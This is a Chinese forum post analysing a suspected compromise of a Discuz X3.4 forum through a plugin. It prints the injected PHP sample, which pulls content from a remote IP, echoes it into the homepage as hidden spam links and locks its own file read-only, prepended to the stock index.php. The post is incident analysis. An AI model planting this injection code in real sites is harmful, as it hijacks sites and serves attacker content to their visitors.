|
|
疑似DZ X3.4插件漏洞调用class_cloud.php首页index.php被插入黑链后门一句话漏洞分析:
远端疑似黑链调用地址:103.226.153.247
一句话黑链代码:
影响文件:
论坛首页:index.php
根目录传输调用:js.php
事例文件内容样本:(js.php)
- <?php
- set_time_limit(0);
- header("Content-Type: text/html;charset=gb2312");
- date_default_timezone_set('PRC');
- $TD_server = "http://103.226.153.247/";
- $host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
- $Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
- echo $Content_mb;
- $url1 = $_SERVER['PHP_SELF'];
- $filename1 = @end(explode('/',$url1));
- function set_writeable($file_name)
- {
- @chmod($file_name,0444);
- }
- set_writeable($filename1);
- cache_end($dir);
- ?>
- <?php
- /**
- * [Discuz!] (C)2001-2099 Comsenz Inc.
- * This is NOT a freeware, use is subject to license terms
- *
- * $Id: index.php 34524 2014-05-15 04:42:23Z nemohou $
- */
- if(!empty($_SERVER['QUERY_STRING']) && is_numeric($_SERVER['QUERY_STRING'])) {
- $_ENV['curapp'] = 'home';
- $_GET = array('mod'=>'space', 'uid'=>$_SERVER['QUERY_STRING']);
- } else {
- $url = '';
- $domain = $_ENV = array();
- $jump = false;
- @include_once './data/sysdata/cache_domain.php';
- $_ENV['domain'] = $domain;
- if(empty($_ENV['domain'])) {
- $_ENV['curapp'] = 'forum';
- } else {
- $_ENV['defaultapp'] = array('portal.php' => 'portal', 'forum.php' => 'forum', 'group.php' => 'group', 'home.php' => 'home');
- $_ENV['hostarr'] = explode('.', $_SERVER['HTTP_HOST']);
- $_ENV['domainroot'] = substr($_SERVER['HTTP_HOST'], strpos($_SERVER['HTTP_HOST'], '.')+1);
- if(!empty($_ENV['domain']['app']) && is_array($_ENV['domain']['app']) && in_array($_SERVER['HTTP_HOST'], $_ENV['domain']['app'])) {
- $_ENV['curapp'] = array_search($_SERVER['HTTP_HOST'], $_ENV['domain']['app']);
- if($_ENV['curapp'] == 'mobile') {
- $_ENV['curapp'] = 'forum';
- if(!isset($_GET['mobile'])) {
- @$_GET['mobile'] = '2';
- }
- }
- if($_ENV['curapp'] == 'default' || !isset($_ENV['defaultapp'][$_ENV['curapp'].'.php'])) {
- $_ENV['curapp'] = '';
- }
- } elseif(!empty($_ENV['domain']['root']) && is_array($_ENV['domain']['root']) && in_array($_ENV['domainroot'], $_ENV['domain']['root'])) {
- $_G['setting']['holddomain'] = $_ENV['domain']['holddomain'] ? $_ENV['domain']['holddomain'] : array('www');
- $list = $_ENV['domain']['list'];
- if(isset($list[$_SERVER['HTTP_HOST']])) {
- $domain = $list[$_SERVER['HTTP_HOST']];
- switch($domain['idtype']) {
- case 'subarea':
- $_ENV['curapp'] = 'forum';
- $_GET['gid'] = intval($domain['id']);
- break;
- case 'forum':
- $_ENV['curapp'] = 'forum';
- $_GET['mod'] = 'forumdisplay';
- $_GET['fid'] = intval($domain['id']);
- break;
- case 'topic':
- $_ENV['curapp'] = 'portal';
- $_GET['mod'] = 'topic';
- $_GET['topicid'] = intval($domain['id']);
- break;
- case 'channel':
- $_ENV['curapp'] = 'portal';
- $_GET['mod'] = 'list';
- $_GET['catid'] = intval($domain['id']);
- break;
- case 'plugin':
- $_ENV['curapp'] = 'plugin';
- $_GET['id'] = $domain['id'];
- $_GET['fromapp'] = 'index';
- break;
- }
- } elseif(count($_ENV['hostarr']) > 2 && $_ENV['hostarr'][0] != 'www' && !checkholddomain($_ENV['hostarr'][0])) {
- $_ENV['prefixdomain'] = addslashes($_ENV['hostarr'][0]);
- $_ENV['domainroot'] = addslashes($_ENV['domainroot']);
- require_once './source/class/class_core.php';
- C::app()->init_setting = true;
- C::app()->init_user = false;
- C::app()->init_session = false;
- C::app()->init_cron = false;
- C::app()->init_misc = false;
- C::app()->init();
- $jump = true;
- $domain = C::t('common_domain')->fetch_by_domain_domainroot($_ENV['prefixdomain'], $_ENV['domainroot']);
- $apphost = $_ENV['domain']['app'][$domain['idtype']] ? $_ENV['domain']['app'][$domain['idtype']] : $_ENV['domain']['app']['default'];
- $apphost = $apphost ? 'http://'.$apphost.'/' : '';
- switch($domain['idtype']) {
- case 'home':
- if($_G['setting']['rewritestatus'] && in_array('home_space', $_G['setting']['rewritestatus'])) {
- $url = rewriteoutput('home_space', 1, $apphost, $domain['id']);
- } else {
- $url = $apphost.'home.php?mod=space&uid='.$domain['id'];
- }
- break;
- case 'group':
- if($_G['setting']['rewritestatus'] && in_array('group_group', $_G['setting']['rewritestatus'])) {
- $url = rewriteoutput('group_group', 1, $apphost, $domain['id']);
- } else {
- $url = $apphost.'forum.php?mod=group&fid='.$domain['id'].'&page=1';
- }
- break;
- }
- }
- } else {
- $jump = true;
- }
- if(empty($url) && empty($_ENV['curapp'])) {
- if(!empty($_ENV['domain']['defaultindex']) && !$jump) {
- if($_ENV['defaultapp'][$_ENV['domain']['defaultindex']]) {
- $_ENV['curapp'] = $_ENV['defaultapp'][$_ENV['domain']['defaultindex']];
- } else {
- $url = $_ENV['domain']['defaultindex'];
- }
- } else {
- if($jump) {
- $url = empty($_ENV['domain']['app']['default']) ? (!empty($_ENV['domain']['defaultindex']) ? $_ENV['domain']['defaultindex'] : 'forum.php') : 'http://'.$_ENV['domain']['app']['default'];
- } else {
- $_ENV['curapp'] = 'forum';
- }
- }
- }
- }
- }
- if(!empty($url)) {
- $delimiter = strrpos($url, '?') ? '&' : '?';
- if(isset($_GET['fromuid']) && $_GET['fromuid']) {
- $url .= sprintf('%sfromuid=%d', $delimiter, $_GET['fromuid']);
- } elseif(isset($_GET['fromuser']) && $_GET['fromuser']) {
- $url .= sprintf('%sfromuser=%s', $delimiter, rawurlencode($_GET['fromuser']));
- }
- $parse = parse_url($url);
- if(!isset($parse['host']) && file_exists($parse['path'])) {
- if(!empty($parse['query'])) {
- parse_str($parse['query'], $_GET);
- }
- require './'.$parse['path'];
- } else {
- header("HTTP/1.1 301 Moved Permanently");
- header("location: $url");
- }
- } else {
- require './'.$_ENV['curapp'].'.php';
- }
- function checkholddomain($domain) {
- global $_G;
- $domain = strtolower($domain);
- if(preg_match("/^[^a-z]/i", $domain)) return true;
- $holdmainarr = empty($_G['setting']['holddomain']) ? array('www') : explode('|', $_G['setting']['holddomain']);
- $ishold = false;
- foreach ($holdmainarr as $value) {
- if(strpos($value, '*') === false) {
- if(strtolower($value) == $domain) {
- $ishold = true;
- break;
- }
- } else {
- $value = str_replace('*', '.*?', $value);
- if(@preg_match("/$value/i", $domain)) {
- $ishold = true;
- break;
- }
- }
- }
- return $ishold;
- }
- ?>
疑似利用 西瓜微信登陆、安全过滤不严谨的模板导致。
建议:
|
|
帐号登录
QQ登录
微信登录
发表于 2018-1-25 10:32:11
发表于 2018-3-17 21:52:25
发表于 2018-8-10 21:08:56
